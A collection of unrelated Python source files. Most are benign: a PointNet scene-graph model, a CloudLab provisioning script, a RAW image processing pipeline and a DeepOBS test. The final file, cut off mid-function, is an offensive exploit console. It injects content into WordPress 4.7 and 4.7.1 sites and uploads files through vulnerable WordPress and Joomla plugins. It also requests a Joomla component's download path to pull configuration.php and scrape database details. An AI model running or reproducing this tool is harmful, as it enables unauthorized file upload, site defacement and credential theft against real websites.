analyzer = DrMemoryAnalyze(options.source_dir, filenames)
retcode = analyzer.Report(False)
sys.exit(retcode)
| StarcoderdataPython |
4834310 | <reponame>orsveri/3DSSG<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
if __name__ == '__main__' and __package__ is None:
from os import sys
sys.path.append('../')
import torch
import torch.optim as optim
import torch.nn.functional as F
from model_base import BaseModel
from network_PointNet import PointNetfeat,PointNetCls,PointNetRelCls,PointNetRelClsMulti
from network_TripletGCN import TripletGCNModel
from network_GNN import GraphEdgeAttenNetworkLayers
from config import Config
import op_utils
class SGPNModel(BaseModel):
def __init__(self,config:Config,name:str, num_class, num_rel):
'''
Scene graph prediction network from https://arxiv.org/pdf/2004.03967.pdf
'''
super().__init__(name,config)
models = dict()
self.mconfig = mconfig = config.MODEL
with_bn = mconfig.WITH_BN
        self.flow = 'target_to_source' # we want the messages to flow from target to source
dim_point = 3
dim_point_rel = 3
if mconfig.USE_RGB:
dim_point +=3
dim_point_rel+=3
if mconfig.USE_NORMAL:
dim_point +=3
dim_point_rel+=3
if mconfig.USE_CONTEXT:
dim_point_rel += 1
# Object Encoder
models['obj_encoder'] = PointNetfeat(
global_feat=True,
batch_norm=with_bn,
point_size=dim_point,
input_transform=False,
feature_transform=mconfig.feature_transform,
out_size=mconfig.point_feature_size)
# Relationship Encoder
models['rel_encoder'] = PointNetfeat(
global_feat=True,
batch_norm=with_bn,
point_size=dim_point_rel,
input_transform=False,
feature_transform=mconfig.feature_transform,
out_size=mconfig.edge_feature_size)
# GCN
# models['gcn'] = GraphTripleConvNet(input_dim_obj=mconfig.point_feature_size,
# num_layers=mconfig.N_LAYERS,
# residual=mconfig.RESIDUAL,
# pooling=mconfig.POOLING,
# input_dim_pred=mconfig.point_feature_size,
# hidden_dim=mconfig.gcn_hidden_feature_size)
# if mconfig.GCN_TYPE != 'TRIP':
# raise RuntimeError('PointNetGCNModel only support TRIP GCN type')
# models['gcn'] = TripletGCNModel(num_layers=mconfig.N_LAYERS,
# dim_node = mconfig.point_feature_size,
# dim_edge = mconfig.point_feature_size,
# dim_hidden = mconfig.gcn_hidden_feature_size)
if mconfig.GCN_TYPE == "TRIP":
models['gcn'] = TripletGCNModel(num_layers=mconfig.N_LAYERS,
dim_node = mconfig.point_feature_size,
dim_edge = mconfig.edge_feature_size,
dim_hidden = mconfig.gcn_hidden_feature_size)
elif mconfig.GCN_TYPE == 'EAN':
models['gcn'] = GraphEdgeAttenNetworkLayers(self.mconfig.point_feature_size,
self.mconfig.edge_feature_size,
self.mconfig.DIM_ATTEN,
self.mconfig.N_LAYERS,
self.mconfig.NUM_HEADS,
self.mconfig.GCN_AGGR,
flow=self.flow)
# node feature classifier
models['obj_predictor'] = PointNetCls(num_class, in_size=mconfig.point_feature_size,
batch_norm=with_bn,drop_out=True)
if mconfig.multi_rel_outputs:
models['rel_predictor'] = PointNetRelClsMulti(
num_rel,
in_size=mconfig.edge_feature_size,
batch_norm=with_bn,drop_out=True)
else:
models['rel_predictor'] = PointNetRelCls(
num_rel,
in_size=mconfig.edge_feature_size,
batch_norm=with_bn,drop_out=True)
params = list()
print('==trainable parameters==')
for name, model in models.items():
if len(config.GPU) > 1:
model = torch.nn.DataParallel(model, config.GPU)
self.add_module(name, model)
params += list(model.parameters())
print(name,op_utils.pytorch_count_params(model))
print('')
self.optimizer = optim.Adam(
params = params,
lr = float(config.LR),
)
self.optimizer.zero_grad()
def forward(self, obj_points, rel_points, edges, return_meta_data=False):
obj_feature = self.obj_encoder(obj_points)
rel_feature = self.rel_encoder(rel_points)
probs=None
if self.mconfig.USE_GCN:
if self.mconfig.GCN_TYPE == 'TRIP':
gcn_obj_feature, gcn_rel_feature = self.gcn(obj_feature, rel_feature, edges)
elif self.mconfig.GCN_TYPE == 'EAN':
gcn_obj_feature, gcn_rel_feature, probs = self.gcn(obj_feature, rel_feature, edges)
if self.mconfig.OBJ_PRED_FROM_GCN:
obj_cls = self.obj_predictor(gcn_obj_feature)
else:
obj_cls = self.obj_predictor(obj_feature)
rel_cls = self.rel_predictor(gcn_rel_feature)
else:
gcn_obj_feature=gcn_rel_feature=None
obj_cls = self.obj_predictor(obj_feature)
rel_cls = self.rel_predictor(rel_feature)
if return_meta_data:
return obj_cls, rel_cls, obj_feature, rel_feature, gcn_obj_feature, gcn_rel_feature, probs
else:
return obj_cls, rel_cls
def process(self, obj_points, rel_points, edges, gt_obj_cls, gt_rel_cls, weights_obj=None, weights_rel=None):
self.iteration +=1
obj_pred, rel_pred, _, _, _, _, probs = self(obj_points, rel_points, edges,return_meta_data=True)
# if self.mconfig.multi_rel_outputs:
# if self.mconfig.w_bg != 0:
# weight_FG_BG = self.mconfig.w_bg * (1 - gt_rel_cls) + (1 - self.mconfig.w_bg) * gt_rel_cls
# else:
# weight_FG_BG = None
# loss_rel = F.binary_cross_entropy(rel_pred, gt_rel_cls, weight=weight_FG_BG)
# else:
# raise NotImplementedError('')
loss_obj = F.nll_loss(obj_pred, gt_obj_cls, weight = weights_obj)
if self.mconfig.multi_rel_outputs:
weight_FG_BG = None
loss_rel = F.binary_cross_entropy(rel_pred, gt_rel_cls, weight=weight_FG_BG)
else:
loss_rel = F.nll_loss(rel_pred, gt_rel_cls, weight=None)
loss = self.mconfig.lambda_o * loss_obj + loss_rel
self.backward(loss)
logs = [("Loss/cls_loss",loss_obj.detach().item()),
("Loss/rel_loss",loss_rel.detach().item()),
("Loss/loss", loss.detach().item())]
return logs, obj_pred.detach(), rel_pred.detach(), probs
def backward(self, loss):
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
def norm_tensor(self, points, dim):
# points.shape = [n, 3, npts]
centroid = torch.mean(points, dim=-1).unsqueeze(-1) # N, 3
points -= centroid # n, 3, npts
furthest_distance = points.pow(2).sum(1).sqrt().max(1)[0] # find maximum distance for each n -> [n]
points /= furthest_distance[0]
return points
def calculate_metrics(self, preds, gts):
assert(len(preds)==2)
assert(len(gts)==2)
obj_pred = preds[0].detach()
rel_pred = preds[1].detach()
obj_gt = gts[0]
rel_gt = gts[1]
pred_cls = torch.max(obj_pred.detach(),1)[1]
acc_obj = (obj_gt == pred_cls).sum().item() / obj_gt.nelement()
pred_rel= rel_pred.detach() > 0.5
acc_rel = (rel_gt==pred_rel).sum().item() / rel_gt.nelement()
logs = [("Accuracy/obj_cls",acc_obj),
("Accuracy/rel_cls",acc_rel)]
return logs
if __name__ == '__main__':
use_dataset = True
config = Config('../config_example.json')
config.MODEL.USE_RGB=False
config.MODEL.USE_NORMAL=False
if not use_dataset:
num_obj_cls=40
num_rel_cls=26
else:
from src.dataset_builder import build_dataset
config.dataset.dataset_type = 'rio_graph'
dataset =build_dataset(config, 'validation_scans', True, multi_rel_outputs=True, use_rgb=False, use_normal=False)
num_obj_cls = len(dataset.classNames)
num_rel_cls = len(dataset.relationNames)
# build model
mconfig = config.MODEL
network = SGPNModel(config,'SGPNModel',num_obj_cls,num_rel_cls)
if not use_dataset:
max_rels = 80
n_pts = 10
n_rels = n_pts*n_pts-n_pts
n_rels = max_rels if n_rels > max_rels else n_rels
obj_points = torch.rand([n_pts,3,128])
rel_points = torch.rand([n_rels, 4, 256])
edges = torch.zeros(n_rels, 2,dtype=torch.long)
counter=0
for i in range(n_pts):
if counter >= edges.shape[0]: break
for j in range(n_pts):
if i==j:continue
if counter >= edges.shape[0]: break
edges[counter,0]=i
edges[counter,1]=i
counter +=1
obj_gt = torch.randint(0, num_obj_cls-1, (n_pts,))
rel_gt = torch.randint(0, num_rel_cls-1, (n_rels,))
# rel_gt
adj_rel_gt = torch.rand([n_pts, n_pts, num_rel_cls])
rel_gt = torch.zeros(n_rels, num_rel_cls, dtype=torch.float)
for e in range(edges.shape[0]):
i,j = edges[e]
for c in range(num_rel_cls):
if adj_rel_gt[i,j,c] < 0.5: continue
rel_gt[e,c] = 1
network.process(obj_points,rel_points,edges,obj_gt,rel_gt)
for i in range(100):
if use_dataset:
scan_id, instance2mask, obj_points, rel_points, obj_gt, rel_gt, edges = dataset.__getitem__(i)
obj_points = obj_points.permute(0,2,1)
rel_points = rel_points.permute(0,2,1)
logs, obj_pred, rel_pred = network.process(obj_points,rel_points,edges,obj_gt,rel_gt)
logs += network.calculate_metrics([obj_pred,rel_pred], [obj_gt,rel_gt])
# pred_cls = torch.max(obj_pred.detach(),1)[1]
# acc_obj = (obj_gt == pred_cls).sum().item() / obj_gt.nelement()
# rel_pred = rel_pred.detach() > 0.5
# acc_rel = (rel_gt==(rel_pred>0)).sum().item() / rel_pred.nelement()
# print('{0:>3d} acc_obj: {1:>1.4f} acc_rel: {2:>1.4f} loss: {3:>2.3f}'.format(i,acc_obj,acc_rel,logs[0][1]))
print('{:>3d} '.format(i),end='')
for log in logs:
print('{0:} {1:>2.3f} '.format(log[0],log[1]),end='')
print('')
| StarcoderdataPython |
6644109 | import os
from geni.aggregate import cloudlab
from geni.rspec import pg
from geni import util
def baremetal_node(name, img, hardware_type):
node = pg.RawPC(name)
node.disk_image = img
node.hardware_type = hardware_type
return node
experiment_name = 'popper-examples'
img = "urn:publicid:IDN+clemson.cloudlab.us+image+schedock-PG0:ubuntu18-docker"
request = pg.Request()
request.addResource(baremetal_node("client", img, 'c6320'))
request.addResource(baremetal_node("server", img, 'c6320'))
# load context
ctx = util.loadContext(key_passphrase=os.environ['GENI_KEY_PASSPHRASE'])
# create slice
util.createSlice(ctx, experiment_name, renew_if_exists=True)
# create sliver on clemson
manifest = util.createSliver(ctx, cloudlab.Clemson, experiment_name, request)
# output files: ansible inventory and GENI manifest
# {
outdir = os.path.dirname(os.path.realpath(__file__))
util.toAnsibleInventory(manifest, hostsfile=outdir+'/hosts')
manifest.writeXML(outdir+'/manifest.xml')
# }
| StarcoderdataPython |
5088744 | """ Simple RAW image processing module"""
import sys
import os
import scipy
from scipy import signal
import numpy as np
from numpy.lib.stride_tricks import as_strided
import rawpy
""" Process RAW file into a image file.
Example usage:
raw = read("sample.ARW")
rgb = process(raw)
write(rgb, "output.ARW")
"""
def read(filename):
"""
Read RAW data from specified file. Currently supported formats are
ARW (Sony RAW format)
JPEG with Raspberry Pi V2.1 camera RAW
:param filename: path to the target RAW file
"""
return rawpy.imread(filename)
def check_functions(filename):
""" Check what functions to be enabled based on filename"""
white_level = 1024
shading_enable = True
defect_correction_enable = True
noise_parameters = (8, 2, 246)
wbg_norm = 1
extension = os.path.splitext(filename)[1]
if extension in (".ARW", ".arw"):
shading_enable = False
defect_correction_enable = False
white_level = 8192
noise_parameters = (8, 0.2, 25)
wbg_norm = 1024
return (shading_enable, defect_correction_enable, white_level, wbg_norm, noise_parameters)
DEFALT_MATRIX = (1024, 0, 0, 0, 1024, 0, 0, 0, 1024)
DEFALT_TONE = ((0, 64, 128, 192, 256), (0, 64, 128, 192, 256))
def process(filename, output_filename, color_matrix=DEFALT_MATRIX, tone_curve=DEFALT_TONE):
"""
This processes RAW data that was read by read() method.
Must be called after read() operation. No error is checked.
"""
shading_enable, defect_crrection_enable, white_level, wbg_norm, noise_param = check_functions(filename)
raw = read(filename)
raw_array = get_raw_array(raw)
raw_array = black_level_correction(raw_array, raw.black_level_per_channel, raw.raw_pattern)
if defect_crrection_enable:
raw_array = defect_crrection(raw_array)
if shading_enable:
raw_array = lens_shading_correction(raw_array, LSC_DEFAULT)
raw_array = white_balance_Bayer(raw_array, raw.camera_whitebalance, wbg_norm, raw.raw_pattern)
rgb_array = advanced_demosaic(raw_array, raw.raw_pattern)
del raw_array, raw
rgb_array = noise_filter(rgb_array, noise_param[0], noise_param[1], noise_param[2])
rgb_array = color_correction_matrix(rgb_array, color_matrix)
rgb_array = gamma_correction(rgb_array/white_level, 2.2)
rgb_array = edge_correction(rgb_array, 2, 0.25, 1, 0.25)
rgb_array = tone_curve_correction(rgb_array, tone_curve[0], tone_curve[1])
write(rgb_array, output_filename)
def get_raw_array(raw):
""" convert raw_img into numpy array"""
h, w = raw.sizes.raw_height, raw.sizes.raw_width
raw_array = np.array(raw.raw_image).reshape((h, w)).astype('float')
return raw_array
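# Black level correction: each of the four Bayer sample positions has its own
# black level reported by the camera; it is subtracted per 2x2 phase below so
# that true black maps to zero before white balance and demosaicing.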
def black_level_correction(raw_array, black_level_per_channel, bayer_pattern):
# rearrange black level
black_level = [0] * 4
black_level[bayer_pattern[0, 0]] = black_level_per_channel[bayer_pattern[0, 0]]
black_level[bayer_pattern[0, 1]] = black_level_per_channel[bayer_pattern[0, 1]]
black_level[bayer_pattern[1, 0]] = black_level_per_channel[bayer_pattern[1, 0]]
black_level[bayer_pattern[1, 1]] = black_level_per_channel[bayer_pattern[1, 1]]
blc_raw = raw_array.copy()
blc_raw[0::2, 0::2] -= black_level[0]
    blc_raw[0::2, 1::2] -= black_level[1]
    blc_raw[1::2, 0::2] -= black_level[2]
    blc_raw[1::2, 1::2] -= black_level[3]
return blc_raw
def defect_crrection(raw_array):
dpc_raw = raw_array.copy()
footprint = np.ones((5, 5))
footprint[2, 2] = 0
for (yo, xo) in ((0, 0), (1, 0), (0, 1), (1, 1)):
single_channel = dpc_raw[yo::2, xo::2]
flt = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]]) / 4
average = scipy.signal.convolve2d(single_channel, flt, mode='same')
local_max = scipy.ndimage.filters.maximum_filter(single_channel, footprint=footprint, mode='mirror')
local_min = scipy.ndimage.filters.minimum_filter(single_channel, footprint=footprint, mode='mirror')
threshold = 16
mask = (single_channel < local_min - threshold) + (single_channel > local_max + threshold)
single_channel[mask] = average[mask]
return dpc_raw
LSC_DEFAULT = [np.array([6.07106808e-07, 9.60556906e-01]),
np.array([6.32044369e-07, 9.70694361e-01]),
np.array([6.28455183e-07, 9.72493898e-01]),
np.array([9.58743579e-07, 9.29427169e-01])]
def lens_shading_correction(raw, coef):
"""
Apply lens shading correction to Bayer input (raw)
Parameter (coef) needs to be array type of coef[4][2]
coef[color][0] is coefficient on 2nd order term.
coef[color][1] is offset
"""
h, w = raw.shape
gain_map = np.zeros((h, w))
center_y, center_x = h // 2, w // 2
x = np.arange(0, w) - center_x
y = np.arange(0, h) - center_y
xs, ys = np.meshgrid(x, y, sparse=True)
r2 = ys * ys + xs * xs
gain_map[::2, ::2] = r2[::2, ::2] * coef[0][0] + coef[0][1]
gain_map[1::2, ::2] = r2[1::2, ::2] * coef[1][0] + coef[1][1]
gain_map[::2, 1::2] = r2[::2, 1::2] * coef[2][0] + coef[2][1]
gain_map[1::2, 1::2] = r2[1::2, 1::2] * coef[3][0] + coef[3][1]
return raw * gain_map
def preview_demosaic(raw_array, bayer_pattern):
""" Very simple demosaic with down sampling for preview purpose"""
h, w = raw_array.shape[0], raw_array.shape[1]
shuffle = np.zeros((h // 2, w // 2, 4))
shuffle[:, :, bayer_pattern[0, 0]] += raw_array[0::2, 0::2]
shuffle[:, :, bayer_pattern[0, 1]] += raw_array[0::2, 1::2]
shuffle[:, :, bayer_pattern[1, 0]] += raw_array[1::2, 0::2]
shuffle[:, :, bayer_pattern[1, 1]] += raw_array[1::2, 1::2]
dms_img = np.zeros((h // 2, w // 2, 3))
dms_img[:, :, 0] = shuffle[:, :, 0]
dms_img[:, :, 1] = (shuffle[:, :, 1] + shuffle[:, :, 3]) / 2
dms_img[:, :, 2] = shuffle[:, :, 2]
return dms_img
def simple_demosaic(raw, raw_array):
""" Simple demosaic algorithm with linear interpolation """
h, w = raw_array.shape
dms_img2 = np.zeros((h, w, 3))
green = raw_array.copy()
green[(raw.raw_colors == 0) | (raw.raw_colors == 2)] = 0
g_flt = np.array([[0, 1 / 4, 0], [1 / 4, 1, 1 / 4], [0, 1 / 4, 0]])
dms_img2[:, :, 1] = signal.convolve2d(green, g_flt, boundary='symm', mode='same')
red = raw_array.copy()
red[raw.raw_colors != 0] = 0
rb_flt = np.array([[1 / 4, 1 / 2, 1 / 4], [1 / 2, 1, 1 / 2], [1 / 4, 1 / 2, 1 / 4]])
dms_img2[:, :, 0] = signal.convolve2d(red, rb_flt, boundary='symm', mode='same')
blue = raw_array.copy()
blue[raw.raw_colors != 2] = 0
rb_flt = np.array([[1 / 4, 1 / 2, 1 / 4], [1 / 2, 1, 1 / 2], [1 / 4, 1 / 2, 1 / 4]])
dms_img2[:, :, 2] = signal.convolve2d(blue, rb_flt, boundary='symm', mode='same')
return dms_img2
def advanced_demosaic(dms_input, bayer_pattern):
""" Demosaic algorithm in frequency domain """
hlpf = np.array([[1, 2, 3, 4, 3, 2, 1]]) / 16
vlpf = np.transpose(hlpf)
hhpf = np.array([[-1, 2, -3, 4, -3, 2, -1]]) / 16
vhpf = np.transpose(hhpf)
identity_filter = np.zeros((7, 7))
identity_filter[3, 3] = 1
# generate FIR filters to extract necessary components
FC1 = np.matmul(vhpf, hhpf)
FC2H = np.matmul(vlpf, hhpf)
FC2V = np.matmul(vhpf, hlpf)
FL = identity_filter - FC1 - FC2V - FC2H
# f_C1 at 4 corners
c1_mod = signal.convolve2d(dms_input, FC1, boundary='symm', mode='same')
# f_C1^1 at wy = 0, wx = +Pi/-Pi
c2h_mod = signal.convolve2d(dms_input, FC2H, boundary='symm', mode='same')
# f_C1^1 at wy = +Pi/-Pi, wx = 0
c2v_mod = signal.convolve2d(dms_input, FC2V, boundary='symm', mode='same')
# f_L at center
f_L = signal.convolve2d(dms_input, FL, boundary='symm', mode='same')
# Move c1 to the center by shifting by Pi in both x and y direction
# f_c1 = c1 * (-1)^x * (-1)^y
f_c1 = c1_mod.copy()
f_c1[:, 1::2] *= -1
f_c1[1::2, :] *= -1
if bayer_pattern[0, 0] == 1 or bayer_pattern[0, 0] == 3:
f_c1 *= -1
    # Move c2h to the center by shifting by Pi in x direction, same for c2v in y direction
c2h = c2h_mod.copy()
c2h[:, 1::2] *= -1
if bayer_pattern[0, 0] == 2 or bayer_pattern[1, 0] == 2:
c2h *= -1
c2v = c2v_mod.copy()
c2v[1::2, :] *= -1
if bayer_pattern[0, 0] == 2 or bayer_pattern[0, 1] == 2:
c2v *= -1
# f_c2 = (c2v_mod * x_mod + c2h_mod * y_mod) / 2
f_c2 = (c2v + c2h) / 2
# generate RGB channel using
# [R, G, B] = [[1, 1, 2], [1, -1, 0], [1, 1, - 2]] x [L, C1, C2]
height, width = dms_input.shape
dms_img = np.zeros((height, width, 3))
dms_img[:, :, 0] = f_L + f_c1 + 2 * f_c2
dms_img[:, :, 1] = f_L - f_c1
dms_img[:, :, 2] = f_L + f_c1 - 2 * f_c2
return dms_img
def white_balance_Bayer(raw_array, wbg, wbg_norm, bayer_pattern):
""" Apply white balance to bayer input"""
img_wb = raw_array.copy()
img_wb[0::2, 0::2] *= wbg[bayer_pattern[0, 0]] / wbg_norm
img_wb[0::2, 1::2] *= wbg[bayer_pattern[0, 1]] / wbg_norm
img_wb[1::2, 0::2] *= wbg[bayer_pattern[1, 0]] / wbg_norm
img_wb[1::2, 1::2] *= wbg[bayer_pattern[1, 1]] / wbg_norm
return img_wb
def noise_filter(rgb_array, coef=8, read_noise=2, shot_noise=246):
""" Apply bilateral noise filter to RGB image"""
h, w, _ = rgb_array.shape
luma_img = rgb_array[:, :, 0] + rgb_array[:, :, 1] + rgb_array[:, :, 2]
average = scipy.ndimage.filters.uniform_filter(luma_img, 5, mode='mirror')
sigma_map = average * shot_noise + read_noise
del average
sigma_map[sigma_map < 1] = 1
sy, sx = sigma_map.strides
sigma_tile = as_strided(sigma_map, strides=(sy, sx, 0, 0), shape=(h, w, 5, 5))
sigma_tile = sigma_tile[2:h-2, 2:w-2, :, :]
del sigma_map
sy, sx = luma_img.strides
luma_tile = as_strided(luma_img, strides=(sy, sx, 0, 0), shape=(h, w, 5, 5))
luma_tile = luma_tile[2:h-2, 2:w-2, :, :]
luma_box = as_strided(luma_img, strides=(sy, sx, sy, sx), shape=(h-4, w-4, 5, 5))
del luma_img
diff = luma_box - luma_tile
del luma_tile, luma_box
diff = diff * diff
weight = np.exp(-coef * diff / sigma_tile)
del diff, sigma_tile
weight_sum = weight.sum(axis=(2, 3))
sy, sx, sz, sw = weight.strides
weight_extend = as_strided(weight, strides=(sy, sx, 0, sz, sw), shape=(h-4, w-4, 3, 5, 5))
del weight
sy, sx = weight_sum.strides
weight_sum_extend = as_strided(weight_sum, strides=(sy, sx, 0), shape=(h-4, w-4, 3))
del weight_sum
sy, sx, sz = rgb_array.strides
img_boxes = as_strided(rgb_array, strides=(sy, sx, sz, sy, sx), shape=(h-4, w-4, 3, 5, 5))
img_flt = (weight_extend * img_boxes).sum(axis=(3, 4)) / weight_sum_extend
return img_flt
def color_correction_matrix(rgb_array, color_matrix):
""" Apply color correction matrix to RGB array"""
img_ccm = np.zeros_like(rgb_array)
ccm = np.array(color_matrix).reshape((3, 3))
norm = ccm.sum(axis=1).mean()
for c in (0, 1, 2):
img_ccm[:, :, c] = ccm[c, 0] * rgb_array[:, :, 0] + \
ccm[c, 1] * rgb_array[:, :, 1] + \
ccm[c, 2] * rgb_array[:, :, 2]
return img_ccm / norm
def gamma_correction(rgb_array, gamma_coef):
""" Apply gamma correction to RGB image"""
img_gamma = rgb_array.copy()
img_gamma[img_gamma < 0] = 0
img_gamma = np.power(img_gamma, 1/gamma_coef)
return img_gamma
def apply_matrix(input_array, matrix):
img_out = np.zeros_like(input_array)
for c in (0, 1, 2):
img_out[:, :, c] = matrix[c, 0] * input_array[:, :, 0] + \
matrix[c, 1] * input_array[:, :, 1] + \
matrix[c, 2] * input_array[:, :, 2]
return img_out
RGB_TO_YCBCR = np.array([[0.299, 0.587, 0.114],
[-0.168736, -0.331264, 0.5],
[0.5, -0.418688, -0.081312]])
def edge_correction(rgb_array, sigma1=2, coef1=0.25, sigma2=1, coef2=0.25):
""" Edge correction for RGB input"""
img_rgb = rgb_array.copy() * 256
img_rgb[img_rgb < 0] = 0
img_rgb[img_rgb > 255] = 255
img_ycbcr = apply_matrix(img_rgb, RGB_TO_YCBCR)
luma = img_ycbcr[:, :, 0]
unsharpen1 = scipy.ndimage.gaussian_filter(luma, sigma=sigma1)
unsharpen2 = scipy.ndimage.gaussian_filter(luma, sigma=sigma2)
sharpen = luma + coef1 * (luma - unsharpen1) + coef2 * (luma - unsharpen2)
img_ycbcr[:, :, 0] = sharpen
ycbcr2rgb = np.linalg.inv(RGB_TO_YCBCR)
img_shp_rgb = apply_matrix(img_ycbcr, ycbcr2rgb) / 256
img_shp_rgb[img_shp_rgb < 0] = 0
img_shp_rgb[img_shp_rgb > 1] = 1
return img_shp_rgb
def tone_curve_correction(img_rgb, xs=(0, 64, 128, 192, 256), ys=(0, 64, 128, 192, 256)):
func = scipy.interpolate.splrep(xs, ys)
img_ycbcr = apply_matrix(img_rgb * 256, RGB_TO_YCBCR)
img_ycbcr[:, :, 0] = scipy.interpolate.splev(img_ycbcr[:, :, 0], func)
ycbcr2rgb = np.linalg.inv(RGB_TO_YCBCR)
img_rgb_out = apply_matrix(img_ycbcr, ycbcr2rgb)
return img_rgb_out / 256
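# Example of a mild S-curve (control points are hypothetical; any monotonic xs/ys
# spanning 0-256 work, like the identity defaults above):
# img_tc = tone_curve_correction(img_rgb, xs=(0, 64, 128, 192, 256),
#                                ys=(0, 48, 128, 208, 256))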
def write(rgb_image, output_filename):
"""
Write the processed RGB image to a specified file as PNG format.
    This must be called after process(). No error is checked.
:param output_filename: path to the output file. Extension must be png.
"""
import imageio
outimg = rgb_image.copy() * 256
outimg[outimg < 0] = 0
outimg[outimg > 255] = 255
imageio.imwrite(output_filename, outimg.astype('uint8'))
def main(argv):
""" main function """
if (len(argv) < 2):
print("Usage: {} input_filename [output_filename] \"color_matrix\" \"tone_x\" \"tone_y\"".format(argv[0]))
print("\tDefault output_filename is output.png")
print("\tDefault matrix is identity matrix \"1024, 0, 0, 0, 1024, 0, 0, 0, 1024\"")
        print("\tDefault tone curve is identity function \"0, 64, 128, 192, 256\" \"0, 64, 128, 192, 256\"")
print("\tExample: python3 {} sample.ARW sample.png \"1141, -205, 88, -52, 1229, -154, 70, -225, 1179\" \"0, 72, 128, 200, 256\" \"0, 56, 128, 220, 256\"".format(argv[0]))
print("\tSupported RAW format is ARW (Sony RAW) and Raspberry Pi (embedded in JPEG)")
print("\tSupported output format is PNG only")
return
filename = argv[1]
output_filename = "output.png"
color_matrix = [1024, 0, 0, 0, 1024, 0, 0, 0, 1024]
tone_curve = [(0, 64, 128, 192, 256), (0, 64, 128, 192, 256)]
if len(argv) > 2:
output_filename = argv[2]
if len(argv) > 3:
color_matrix = [int(value) for value in (argv[3]).split(',')]
if len(argv) > 4:
tone_curve[0] = [int(value) for value in (argv[4]).split(',')]
if len(argv) > 5:
tone_curve[1] = [int(value) for value in (argv[5]).split(',')]
process(filename, output_filename, color_matrix, tone_curve)
if __name__ == "__main__":
main(sys.argv)
| StarcoderdataPython |
9654978 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""Tests for the All-CNN-C architecture on the CIFAR-100 dataset."""
import os
import sys
import unittest
import tensorflow as tf
import numpy as np
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
from deepobs.tensorflow import testproblems
class Cifar100_AllCNNCTest(unittest.TestCase):
"""Test for the All-CNN-C architecture on the CIFAR-100 dataset."""
def setUp(self):
"""Sets up CIFAR-100 dataset for the tests."""
self.batch_size = 100
self.cifar100_allcnnc = testproblems.cifar100_allcnnc(self.batch_size)
def test_init_ops(self):
"""Tests all three initialization operations."""
tf.reset_default_graph()
tf.set_random_seed(42)
self.cifar100_allcnnc.set_up()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
num_param = [
np.prod(v.get_shape().as_list())
for v in tf.trainable_variables()
]
# Check if number of parameters per "layer" is equal to what we expect
# We will write them in the following form:
# - Conv layer: [input_filter*output_filter*kernel[0]*kernel[1]]
# - Batch norm: [input, input] (for beta and gamma)
# - Fully connected: [input*output]
# - Bias: [dim]
self.assertEqual(num_param, [
3 * 96 * 3 * 3, 96, 96 * 96 * 3 * 3, 96, 96 * 96 * 3 * 3, 96,
96 * 192 * 3 * 3, 192, 192 * 192 * 3 * 3, 192,
192 * 192 * 3 * 3, 192, 192 * 192 * 3 * 3, 192,
192 * 192 * 1 * 1, 192, 192 * 100 * 1 * 1, 100
])
for init_op in [
self.cifar100_allcnnc.train_init_op,
self.cifar100_allcnnc.test_init_op,
self.cifar100_allcnnc.train_eval_init_op
]:
sess.run(init_op)
losses_, regularizer_, accuracy_ = sess.run([
self.cifar100_allcnnc.losses,
self.cifar100_allcnnc.regularizer,
self.cifar100_allcnnc.accuracy
])
self.assertEqual(losses_.shape, (self.batch_size, ))
self.assertIsInstance(regularizer_, np.float32)
self.assertIsInstance(accuracy_, np.float32)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3391694 | #-*- coding: utf-8 -*-
from .lib import (
uploadhandler,
post_data,
drupal_rce,
apache_struts2,
dvr,
wp_content_inject,
)
from .utils import (
exploit_modules,
description,
show,
log,
proto,
upload_debug,
json_respon
)
import readline,requests,re
log = log(__name__)
sss = []
for i in exploit_modules:
xx = exploit_modules[i]
for x in xx:
sss.append(x)
def main():
wp = exploit_modules['wordpress']
jom = exploit_modules['joomla']
oth = exploit_modules['other']
T = 'url: '
F = 'path file: '
N = 'upload with name: '
while True:
try:
inp = input('zsf(\033[91mexploit\033[0m): ').lower()
if inp == wp[0]:
x = wp_content_inject(proto(input(T)))
ver = x.get_version()
if ver == 'not vuln':
log(30,f'not vulnerabilty')
else:
if ver == '4.7' or ver == '4.7.1':
ttl = input('post title: ')
ctn = input('post content: ')
log.log(10,'injecting content....')
for i in x.get_id():
p = x.post_content(ttl,ctn,i)
log.log(10,f'postID: {i} status: {p.status_code}')
else:
log.log(30,f'not vulnerability for version {ver}')
elif inp == wp[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_revslider
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[2]:
url = proto(input(T))
pth = input(F)
nm = input(N)
pd = post_data(pth,nm).wp_learndash
x = uploadhandler(url,path1='/',path2=pd[1],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[3]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_showbiz
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[4]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_audio_control
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[5]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_geoplace3
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=None,files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == wp[6]:
url = proto(input(T))
pd = post_data(input(F),input(N)).wp_pugeot_music
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[0]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_fabrik
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[1]:
url = proto(input(T))
pd = post_data(input(F),input(N)).com_ads_manager
x = uploadhandler(url,path1=pd[1],path2=pd[2],post_data=pd['data'],files_data=pd['files'])
upload_debug(x.post(),x.get_check())
elif inp == jom[2]:
url = proto(input(T))
r = requests.get(f'{url}/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',verify=False)
if 'JConfig' in r.text:
host = re.findall("host = '(.*)';",r.text)
